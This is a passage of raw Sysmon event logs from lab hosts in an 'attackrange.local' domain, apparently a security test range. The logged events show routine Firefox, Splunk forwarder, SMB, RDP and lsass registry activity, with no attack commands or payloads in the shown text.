Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001055718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001055717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf7a7690.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.694{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=01C92B658847BD0E90CD438B4E57EEBA,SHA256=F3C819DD85867944E34047DB8E582756EBA1D55B897E565103F24AC9B1F7893B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5108EDF48AE8798ACE9008C936792642,SHA256=AF28F4E3A40ABA027E4CD5C13B37F7E00A5E1993C40E0BC45EA31F4F98A355C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A3D14D22F6257B0574F6AC85AA6F9D9,SHA256=B4472BCF04709C1CBBFC163786641FE1BBE70726CA71B9BEFE57795AD06B5216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=458AD15C353CAAA2AEEE8E4DCF1AE051,SHA256=0EAF074DAA312453BE5A1BAC498BBBE359F7B2455E1D2CFA8BE0F1B5388BE681,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:58.398{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57505-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:00.031{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9783CDAAC2F01490AAF88D55A4D791A,SHA256=52D4BD73C992F4F75CC973AB0CAD223F0EC6A0222F53DF9212646B88238B850A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62016-false10.0.1.12-8000- 23542300x80000000000000001055736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.962{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72555D7F097589B58CDF6422E148B08E,SHA256=23D2BA9B169A2B633FDF6CEA2384AAA701BC3DB7437806078DEE3DB07F8DDCC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.962{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4227AFEC3E0EDBC267A80EBDE979A956,SHA256=865602E1C16405E9ED1FF6069033875FA48462D2E2EEF43994688C1B7E06D90B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=58DCA98D11296AA89C6FBBD671BDF6BB,SHA256=8280D5B3EDD0CA195905544706CCE29489497CF22AEA8C61AF4E831D232ACA52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FEE052AAE13ED1FFAE448B679DC72EAC,SHA256=F872920256BE21DDB33D1A22E4B038A6D6080CB34893A5A9543EDA832A2B939F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CEE9F4C620C90BD391C13B52683E5812,SHA256=49ABA5C23295B307CCFC497800DEDAF10B4B9544FC12B8881F35A915CCB7D5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6D4B0AB0C6D75AE80524259846B9C42C,SHA256=6E4A4CAADAA9F534F32E97B56F3E1A9667B56C1690BF3465DB07A1B8F91A3F88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6BBDC143F1017C82D9C5EE240E7913,SHA256=165FA0005D552CD250DE1D976DFC02A828A3C0004DDD219449F4C83544536258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=479CDEB5C83763F1F3606852AF8C0F97,SHA256=2A9D8141DD947D34DD1DD8A38023C13A7660D2E8EC799471351AC5F224F4D4BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51BB1C4D57D113B42C172C9F950E87A2,SHA256=D262565B94C67608B6F5F5F9079647B194CC5D4C0E92E6CCDFE3DC8B8E07F918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EF84E159580C8D550579012D63667E39,SHA256=B8FBCEF4463CE356B3EDA54AE26CABEB6E8C460F0638D937E45C7A0750E7A3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5BC4AC5F042CAA61AD1F692B396DF02D,SHA256=D565659BDBF2568C5F5C2EAACBDE3D9B2A0FA1201186409A21DB88F306D0C69F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.894{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5108EDF48AE8798ACE9008C936792642,SHA256=AF28F4E3A40ABA027E4CD5C13B37F7E00A5E1993C40E0BC45EA31F4F98A355C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF5A988F22E2FE380041A6D6594F0A18,SHA256=BA647D26A13F00FBEE6FE2F7FA5621C7E3C21636CF3B01F1A618E20C53217632,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:59.840{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57506-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal445microsoft-ds 23542300x8000000000000000810982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:01.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8FA89748C2E853DAA836AA5ED7BEAE,SHA256=0464573E72D8B138BAEFB83525A4CEE421644F31FD82D133122A8F8315AEE797,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.234{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net3497-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.211{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57506-false10.0.1.14win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001055737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:02.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE665C234C8EC9D96AD24D34C19CBB0,SHA256=A0E9221EBF3C9E31265C47565403FC2DA0BBC035BFBAE17AFDF4ACD8883761E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:02.063{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A2587EDBEEAEE2F80F84FDC4CAB54E,SHA256=FF01EDDAF01A8878B9A2E251EFBCF95AB77A6E3977007A534CCE60CDDC195A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:03.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42ADB57ADBB5EE2EE8C978C193604D6,SHA256=D4A0C00D894FF4726AF76A8D0C6F39A33194273402A51AE7F1E80CDC95776429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:03.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4C7DB026E9C65897CCFDDE2CDAC103,SHA256=7D6D3C437278CA811FF5EFC031A01EE2F27DFF28C770CB30C945F438C2F34676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:04.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16526C6EBFE1366B0F176E47D32BFD1D,SHA256=F0ED1A343B516C5B10E35DBBFC092FAB24E372A4627B512945149A84DEFBE7ED,IMPHASH=00000000000000000000000000000000falsetrue 
13241300x8000000000000000810996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f734485) 13241300x8000000000000000810994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ed-0x139be8c5) 13241300x8000000000000000810993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x756050c5) 13241300x8000000000000000810992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5) 13241300x8000000000000000810991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f734485) 13241300x8000000000000000810989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ed-0x139be8c5) 13241300x8000000000000000810988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x756050c5) 13241300x8000000000000000810987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5) 23542300x8000000000000000810986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:04.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EE4A46DD15E498BAD7A772AE48C134,SHA256=C1305DC50B57CCE67C97B9A5029559F28596ADF69DE96E36723122EB6516295B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:05.692{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C75B70C6472AEA73BC876B2DBF8D0C,SHA256=0A180BE71B3A884E4BFFE87035020A2A2DC2C09D550C80F6E09998FFAF524DD6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:04.368{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57507-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:05.281{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB6A8885F792180CD9392A6693CB57E,SHA256=342C385C6CAD42E54B99ED33B211FE9DA6A34A42AF8DF1D11B1502A63F689B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.761{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58976F4652293AAD388DA799EDF2D17,SHA256=05E6CE0165F38947E64C18760799D664D828126D0049D0137BF732805489E3A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:06.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8DC8EDFF49B152429909FDC99E5ECA8,SHA256=1AD5D75D701122D2413DAB244CCCBA0BFD07BCF3F8FF86D7B6D98271644860CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.685{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62017-false10.0.1.12-8000- 23542300x80000000000000001055745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.576{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla 
Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla 